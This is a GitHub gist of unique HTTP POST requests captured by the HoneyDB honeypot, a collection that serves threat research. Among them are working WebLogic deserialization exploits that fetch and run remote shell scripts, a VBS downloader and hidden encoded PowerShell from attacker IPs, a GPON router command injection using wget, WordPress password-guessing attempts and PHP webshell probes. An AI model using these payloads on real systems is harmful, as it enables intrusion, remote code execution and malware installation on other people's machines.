Created
July 9, 2018 15:42
-
-
Save foospidy/548ea8f576df2aea4ee166e3c90ae861 to your computer and use it in GitHub Desktop.
Unique POST requests collected from HoneyDB data
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST / HTTP/1.1 | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | |
Host: x.x.x.x | |
Content-Length: 408 | |
Cache-Control: no-cache | |
Q/Rayd3IZhxBqzgkL0J7deIVkVpJ20LD8qxp2iY6wqlhb7uJMoBoekEb9ZFuseGv3J5TnIUnC7pDXGwIc/1LM7v/5BNrkt/rlfBG7gZ4m7O7CGW0DCGfqGVXT4c7ex/ZNqFhOM1WyXCI+nAcWTbrF95VC2y3XDi1VpsMdE06YNWnmYdB57kkO1ZFTa9uxMukUBALs0kybZEXot2gj8gGd2NnoFzMpfbX85JschPX0MBY1uJV1TdhBQKcQ6h+ZBAC7JVBKqUXtuBu+ZyiJZRk7+OB/kVcWeWKqzEaavg1C1dEg4+sfjWcvU2N2DcvbPsx9aF/qYjhYuJSQ8AeawsNCcvwwlJg1aQuG+hrAPX5qkTOLzmaNTeIVqPUvdDNitzOR+WUyDoOfskqy7Txzxlf9JZy | |
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 | |
Host: x.x.x.x:7001 | |
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | |
Content-Length: 556 | |
Content-Type: text/xml | |
Accept-Encoding: gzip | |
Connection: close | |
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> | |
POST http://cfg.cml.ksmobile.com/post HTTP/1.1 | |
Accept-Encoding: gzip | |
Content-Length: 1043 | |
Content-Type: multipart/form-data; boundary=WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2 | |
Host: cfg.cml.ksmobile.com | |
Connection: Keep-Alive | |
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2 | |
Content-Disposition: form-data; name="protocver" | |
Content-Type: text/plain; charset=UTF-8 | |
Content-Transfer-Encoding: 8bit | |
1 | |
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2 | |
Content-Disposition: form-data; name="ran" | |
Content-Type: text/plain; charset=UTF-8 | |
Content-Transfer-Encoding: 8bit | |
895028 | |
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2 | |
Content-Disposition: form-data; name="sig" | |
Content-Type: text/plain; charset=UTF-8 | |
Content-Transfer-Encoding: 8bit | |
711ce935c81908a4f1c10d1623d47ff4 | |
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2 | |
Content-Disposition: form-data; name="flag" | |
Content-Type: text/plain; charset=UTF-8 | |
Content-Transfer-Encoding: 8bit | |
0 | |
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2 | |
Content-Disposition: form-data; name="data" | |
Content-Type: text/plain; charset=UTF-8 | |
Content-Transfer-Encoding: 8bit | |
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"} | |
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2-- | |
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 | |
Host: x.x.x.x:7001 | |
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | |
Content-Length: 556 | |
Content-Type: text/xml | |
Accept-Encoding: gzip | |
Connection: close | |
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> | |
POST /wp-login.php HTTP/1.1 | |
Referer: http://x.x.x.x/wp-login.php | |
Accept: */* | |
Accept-Language: zh-cn | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | |
Host: x.x.x.x | |
Content-Length: 18 | |
Cache-Control: no-cache | |
log=172&pwd=172888 | |
POST http://infoc2.duba.net/c/ HTTP/1.1 | |
Content-Length: 129 | |
Host: infoc2.duba.net | |
Connection: Keep-Alive | |
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) | |
Å Á*4? Ã≈*ÄH!O“§ ∞î ˛ º¶º¶º ·Ê•¡Ã ∏ –·ÈÁ· ≈¡®ºƒ‹Õ ΩÎÏπºÓ∏± ∏s ≈¡®ºƒ‹Õ –·ÈÁ· ∞î zûY ›∆√«∆fl | |
POST /xx.php HTTP/1.1 | |
Host: x.x.x.x:80 | |
User-Agent: Mozilla/5.0 | |
Connection: Close | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 25 | |
axa=die('Hello, Peppa!'); | |
POST /wuwu11.php HTTP/1.1 | |
Host: x.x.x.x:80 | |
User-Agent: Mozilla/5.0 | |
Connection: Close | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 23 | |
POST http://check.proxyradar.com/azenv.php?auth=149503078861&a=PSCMN&i=1082769359&p=80 HTTP/1.1 | |
Cookie: testCookie=true | |
Host: check.proxyradar.com | |
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) | |
Referer: https://proxyradar.com/ | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 13 | |
Connection: close | |
testPost=true | |
POST /wp-login.php HTTP/1.1 | |
Referer: http://x.x.x.x/wp-login.php | |
Accept: */* | |
Accept-Language: zh-cn | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | |
Host: x.x.x.x | |
Content-Length: 20 | |
Cache-Control: no-cache | |
log=admin&pwd=aaaaaa | |
POST http://check.proxyradar.com/azenv.php?auth=149547882835&a=PSCMN&i=1082769359&p=80 HTTP/1.1 | |
Cookie: testCookie=true | |
Host: check.proxyradar.com | |
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) | |
Referer: https://proxyradar.com/ | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 13 | |
Connection: close | |
testPost=true | |
POST /wp-login.php HTTP/1.1 | |
Referer: http://jamesatchue.com/wp-login.php | |
Accept: */* | |
Accept-Language: zh-cn | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | |
Host: jamesatchue.com | |
Content-Length: 28 | |
Cache-Control: no-cache | |
log=jamesatchue&pwd=99999999 | |
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 | |
Host: x.x.x.x:7001 | |
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | |
Content-Length: 556 | |
Content-Type: text/xml | |
Accept-Encoding: gzip | |
Connection: close | |
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> | |
POST /db.init.php HTTP/1.1 | |
Host: x.x.x.x:80 | |
User-Agent: Mozilla/5.0 | |
Connection: Close | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 48 | |
eval=die('Hello, Peppa!'.(string)(111111111*9)); | |
POST /wp-login.php HTTP/1.1 | |
Referer: http://jamesatchue.com/wp-login.php | |
Accept: */* | |
Accept-Language: zh-cn | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | |
Host: jamesatchue.com | |
Content-Length: 20 | |
Cache-Control: no-cache | |
log=admin&pwd=171717 | |
POST /wuwu11.php HTTP/1.1 | |
Host: x.x.x.x:80 | |
User-Agent: Mozilla/5.0 | |
Connection: Close | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 45 | |
h=die('Hello, Peppa!'.(string)(111111111*9)); | |
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 | |
Host: x.x.x.x:7001 | |
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | |
Content-Length: 556 | |
Content-Type: text/xml | |
Accept-Encoding: gzip | |
Connection: close | |
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> | |
POST /xx.php HTTP/1.1 | |
Host: x.x.x.x:80 | |
User-Agent: Mozilla/5.0 | |
Connection: Close | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 25 | |
axa=die('Hello, Peppa!'); | |
POST http://check.proxyradar.com/azenv.php?auth=149604380857&a=PSCMN&i=2335900298&p=8080 HTTP/1.1 | |
Cookie: testCookie=true | |
Host: check.proxyradar.com | |
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) | |
Referer: https://proxyradar.com/ | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 13 | |
Connection: close | |
testPost=true | |
POST /wuwu11.php HTTP/1.1 | |
Host: x.x.x.x:80 | |
User-Agent: Mozilla/5.0 | |
Connection: Close | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 45 | |
h=die('Hello, Peppa!'.(string)(111111111*9)); | |
POST /wp-login.php HTTP/1.1 | |
Referer: http://x.x.x.x/wp-login.php | |
Accept: */* | |
Accept-Language: zh-cn | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | |
Host: x.x.x.x | |
Content-Length: 18 | |
Cache-Control: no-cache | |
log=172&pwd=monkey | |
POST / HTTP/1.1 | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E) | |
Host: x.x.x.x | |
Content-Length: 436 | |
Cache-Control: no-cache | |
SqNckt+eYZF7jH4xIPiStx+KsAmgALBzeeEKyXVpDXYERhZ4Tn/7gxAJAtuEdLnBGSraQCHmjktBuyNJU09rKJr0Whbgx0jJwDzFhjqoqezDe4NMY+egJmC5xZ6cW88zRTH2gmLxZ/uV2syHuBmx+qz1g317uBw6ASnBoJDz5+V4wc2nHwvHM/gPUw7m/GNZXFLWTX5y4+VGYKxgg53YwRVrRsKZBjbPymnI6fuMFRAgMO9FX1qY7VHjQEVjc3+rWzSq5SyDQisWCy7+nSxzbGkVGuXk8J9v9Sd8Q8bF9BufnmHfqV6jXQrF1QEQKqsD8isO1KkDOHFx4kXyig5/7wt9mSotStfrgvss/LIxjhx6m47dOtHf+6QQk7Mz8Heuz4aB2O7xmzwU/BrhYu4kMWyCcFVblP2H6SooiTCEchxcdGJ7Unw= | |
POST /wls-wsat/CoordinatorPortType HTTP/1.1 | |
Host: x.x.x.x:80 | |
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0 | |
Connection: Close | |
Content-Type: text/xml | |
Content-Length: 1195 | |
POST http://infoc2.duba.net/c/ HTTP/1.1 | |
Content-Length: 129 | |
Host: infoc2.duba.net | |
Connection: Keep-Alive | |
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) | |
Å ÜôOà Ã≈*ÄH!O“§ ∞î ˛ º¶º¶º ·Ê•¡Ã ∏ –·ÈÁ· ≈¡®ºƒ‹Õ ΩÎÏπºÓ∏± ∏s ≈¡®ºƒ‹Õ –·ÈÁ· ∞î Æ˛Y ›∆√«∆fl | |
POST /db.init.php HTTP/1.1 | |
Host: x.x.x.x:80 | |
User-Agent: Mozilla/5.0 | |
Connection: Close | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 48 | |
eval=die('Hello, Peppa!'.(string)(111111111*9)); | |
POST /wp-login.php HTTP/1.1 | |
Referer: http://x.x.x.x/wp-login.php | |
Accept: */* | |
Accept-Language: zh-cn | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | |
Host: x.x.x.x | |
Content-Length: 19 | |
Cache-Control: no-cache | |
log=admin&pwd=test1 | |
POST http://infoc2.duba.net/c/ HTTP/1.1 | |
Content-Length: 129 | |
Host: infoc2.duba.net | |
Connection: Keep-Alive | |
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) | |
Å %Ñlh Ã≈*ÄH!O“§ ∞î ˛ º¶º¶º ·Ê•¡Ã ∏ –·ÈÁ· ≈¡®ºƒ‹Õ ΩÎÏπºÓ∏± ∏s ≈¡®ºƒ‹Õ –·ÈÁ· ∞î ¯+Y ›∆√«∆fl | |
POST http://ssdk.adkmob.com/rp/ HTTP/1.1 | |
Content-Length: 231 | |
Content-Type: text/plain; charset=ISO-8859-1 | |
Host: ssdk.adkmob.com | |
Connection: Keep-Alive | |
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36 | |
v=17&ac=50&pos=32518&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.banner","des":"","sug":-1}] | |
POST / HTTP/1.1 | |
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) | |
Host: x.x.x.x | |
Content-Length: 0 | |
Connection: close | |
POST http://infoc2.duba.net/c/ HTTP/1.1 | |
Content-Length: 129 | |
Host: infoc2.duba.net | |
Connection: Keep-Alive | |
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) | |
Å Á*4? Ã≈*ÄH!O“§ ∞î ˛ º¶º¶º ·Ê•¡Ã ∏ –·ÈÁ· ≈¡®ºƒ‹Õ ΩÎÏπºÓ∏± ∏s ≈¡®ºƒ‹Õ –·ÈÁ· ∞î zûY ›∆√«∆fl | |
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 | |
Host: x.x.x.x:7001 | |
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | |
Content-Length: 556 | |
Content-Type: text/xml | |
Accept-Encoding: gzip | |
Connection: close | |
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> | |
POST http://check.proxyradar.com/azenv.php?auth=149460066237&a=PSCMN&i=1082784101&p=80 HTTP/1.1 | |
Cookie: testCookie=true | |
Host: check.proxyradar.com | |
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) | |
Referer: https://proxyradar.com/ | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 13 | |
Connection: close | |
testPost=true | |
POST /sheep.php HTTP/1.1 | |
Host: x.x.x.x:80 | |
User-Agent: Mozilla/5.0 | |
Connection: Close | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 28 | |
m=die((string)(111111111*9)) | |
POST /GponForm/diag_Form?images/ HTTP/1.1 | |
Host: x.x.x.x:8080 | |
Connection: keep-alive | |
Accept-Encoding: gzip, deflate | |
Accept: */* | |
User-Agent: Hello, World | |
Content-Length: 118 | |
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0 | |
POST http://123.249.24.233/POST_ip_port.php HTTP/1.1 | |
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */* | |
Accept-Language: zh-cn | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | |
Host: x.x.x.x | |
Content-Length: 41 | |
Pragma: no-cache | |
&verifycode=&ip_port=162.252.243.126:8080 | |
POST http://infoc2.duba.net/c/ HTTP/1.1 | |
Content-Length: 129 | |
Host: infoc2.duba.net | |
Connection: Keep-Alive | |
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) | |
Å /ïÊ| Ã≈*ÄH!O“§ ∞î ˛ º¶º¶º ·Ê•¡Ã ∏ –·ÈÁ· ≈¡®ºƒ‹Õ ΩÎÏπºÓ∏± ∏s ≈¡®ºƒ‹Õ –·ÈÁ· | |
∞î &á.Y ›∆√«∆fl | |
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 | |
Host: x.x.x.x:7001 | |
Content-Length: 2471 | |
Accept-Encoding: gzip, deflate | |
Accept: */* | |
User-Agent: python-requests/2.9.1 | |
Connection: keep-alive | |
content-type: text/xml | |
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> | |
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> | |
<java version="1.8.0_151" class="java.beans.XMLDecoder"> | |
<void class="java.lang.ProcessBuilder"> | |
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c "echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>C:/Windows/temp/getpocc.vbs&@echo objXMLHTTP.open "GET","http://198.50.179.109:8020/taskhostxz.exe",false>>C:/Windows/temp/getpocc.vbs&@echo objXMLHTTP.send()>>C:/Windows/temp/getpocc.vbs&@echo If objXMLHTTP.Status=200 Then>>C:/Windows/temp/getpocc.vbs&@echo Set objADOStream=CreateObject("ADODB.Stream")>>C:/Windows/temp/getpocc.vbs&@echo objADOStream.Open>>C:/Windows/temp/getpocc.vbs&@echo objADOStream.Type=1 >>C:/Windows/temp/getpocc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>C:/Windows/temp/getpocc.vbs&@echo objADOStream.Position=0 >>C:/Windows/temp/getpocc.vbs&@echo objADOStream.SaveToFile "C:/Windows/temp/taskhostxz.exe">>C:/Windows/temp/getpocc.vbs&@echo objADOStream.Close>>C:/Windows/temp/getpocc.vbs&@echo Set objADOStream=Nothing>>C:/Windows/temp/getpocc.vbs&@echo End if>>C:/Windows/temp/getpocc.vbs&@echo Set objXMLHTTP=Nothing>>C:/Windows/temp/getpocc.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>C:/Windows/temp/getpocc.vbs&@echo objShell.Exec("C:/Windows/temp/taskhostxz.exe")>>C:/Windows/temp/getpocc.vbs&cscript.exe C:/Windows/temp/getpocc.vbs"</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope> | |
POST /sheep.php HTTP/1.1 | |
Host: x.x.x.x:80 | |
User-Agent: Mozilla/5.0 | |
Connection: Close | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 22 | |
m=die('Hello, Peppa!') | |
POST /wp-login.php HTTP/1.1 | |
Referer: http://x.x.x.x/wp-login.php | |
Accept: */* | |
Accept-Language: zh-cn | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | |
Host: x.x.x.x | |
Content-Length: 22 | |
Cache-Control: no-cache | |
log=admin&pwd=17233333 | |
POST /w.php HTTP/1.1 | |
Host: x.x.x.x:80 | |
User-Agent: Mozilla/5.0 | |
Connection: Close | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 26 | |
POST http://infoc2.duba.net/c/ HTTP/1.1 | |
Content-Length: 129 | |
Host: infoc2.duba.net | |
Connection: Keep-Alive | |
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) | |
Å I™c Ã≈*ÄH!O“§ ∞î ˛ º¶º¶º ·Ê•¡Ã ∏ –·ÈÁ· ≈¡®ºƒ‹Õ ΩÎÏπºÓ∏± ∏s ≈¡®ºƒ‹Õ –·ÈÁ· | |
∞î ÊöY ›∆√«∆fl | |
POST /wls-wsat/CoordinatorPortType HTTP/1.1 | |
Host: x.x.x.x:80 | |
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0 | |
Connection: Close | |
Content-Type: text/xml | |
Content-Length: 1214 | |
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> | |
<soapenv:Header> | |
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> | |
<java version="1.8.0_131" class="java.beans.XMLDecoder"> | |
<void class="java.lang.ProcessBuilder"> | |
<array class="java.lang.String" length="3"> | |
<void index="0"> | |
<string>cmd.exe</string> | |
</void> | |
<void index="1"> | |
<string>/c</string> | |
</void> | |
<void index="2"> | |
<string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMQAuADEANwAuADIAOAAuADEANQAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string> | |
</void> | |
</array> | |
<void method="start"/> | |
</void> | |
</java> | |
</work:WorkContext> | |
</soapenv:Header> | |
<soapenv:Body/> | |
</soapenv:Envelope> | |
POST http://cfg.cml.ksmobile.com/post HTTP/1.1 | |
Accept-Encoding: gzip | |
Content-Length: 1069 | |
Content-Type: multipart/form-data; boundary=0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV | |
Host: cfg.cml.ksmobile.com | |
Connection: Keep-Alive | |
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV | |
Content-Disposition: form-data; name="protocver" | |
Content-Type: text/plain; charset=UTF-8 | |
Content-Transfer-Encoding: 8bit | |
1 | |
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV | |
Content-Disposition: form-data; name="ran" | |
Content-Type: text/plain; charset=UTF-8 | |
Content-Transfer-Encoding: 8bit | |
329937 | |
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV | |
Content-Disposition: form-data; name="sig" | |
Content-Type: text/plain; charset=UTF-8 | |
Content-Transfer-Encoding: 8bit | |
892970794664e96c8e660be7c39e7de0 | |
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV | |
Content-Disposition: form-data; name="flag" | |
Content-Type: text/plain; charset=UTF-8 | |
Content-Transfer-Encoding: 8bit | |
0 | |
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV | |
Content-Disposition: form-data; name="data" | |
Content-Type: text/plain; charset=UTF-8 | |
Content-Transfer-Encoding: 8bit | |
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"} | |
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV-- | |
POST http://infoc2.duba.net/c/ HTTP/1.1 | |
Content-Length: 129 | |
Host: infoc2.duba.net | |
Connection: Keep-Alive | |
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) | |
Å I™c Ã≈*ÄH!O“§ ∞î ˛ º¶º¶º ·Ê•¡Ã ∏ –·ÈÁ· ≈¡®ºƒ‹Õ ΩÎÏπºÓ∏± ∏s ≈¡®ºƒ‹Õ –·ÈÁ· | |
∞î ÊöY ›∆√«∆fl | |
POST http://check.proxyradar.com/azenv.php?auth=149517555919&a=PSCMN&i=2335900298&p=8080 HTTP/1.1 | |
Cookie: testCookie=true | |
Host: check.proxyradar.com | |
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) | |
Referer: https://proxyradar.com/ | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 13 | |
Connection: close | |
testPost=true | |
POST / HTTP/1.1 | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | |
Host: x.x.x.x | |
Content-Length: 360 | |
Cache-Control: no-cache | |
Q6xWx9PNbPx9u2hkZlelWbTXjU4MR+FbF0PgF4FHjZMIe6RjjuTWvskIH6GhDtkvm+J/nOqMlwY2npO1Jw4nZP+rqI6lRuvq1HslIimZ+GzOVCpRITNT/ePfHAiTdF1cxFW1dO3RDkZ6zNHs8wsRa9K5GT0w8ioKO8yGEb23o4zBfnjx0zfTmvw6DyZ76bgRdk24gXRma2/L7lp6MmMOxK5bAtoWOQp/tdoorKUKxGQISPN/R4MohWzajOs6YzvbrzWgK1YX5F8EfwKKlz2XgiCWoMTM9VT+dcxcUzysi5cYZE4yagoOU4YNv72AZ6qFmTVE7k8GjxvAqgmvMYJzcpCDxy8llDDhRvuxG7U= | |
POST http://infoc2.duba.net/c/ HTTP/1.1 | |
Content-Length: 129 | |
Host: infoc2.duba.net | |
Connection: Keep-Alive | |
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) | |
Å a‰Ã Ã≈*ÄH!O“§ ∞î ˛ º¶º¶º ·Ê•¡Ã ∏ –·ÈÁ· ≈¡®ºƒ‹Õ ΩÎÏπºÓ∏± ∏s ≈¡®ºƒ‹Õ –·ÈÁ· ∞î »º-Y ›∆√«∆fl | |
POST / HTTP/1.1 | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko | |
Host: x.x.x.x | |
Content-Length: 392 | |
Cache-Control: no-cache | |
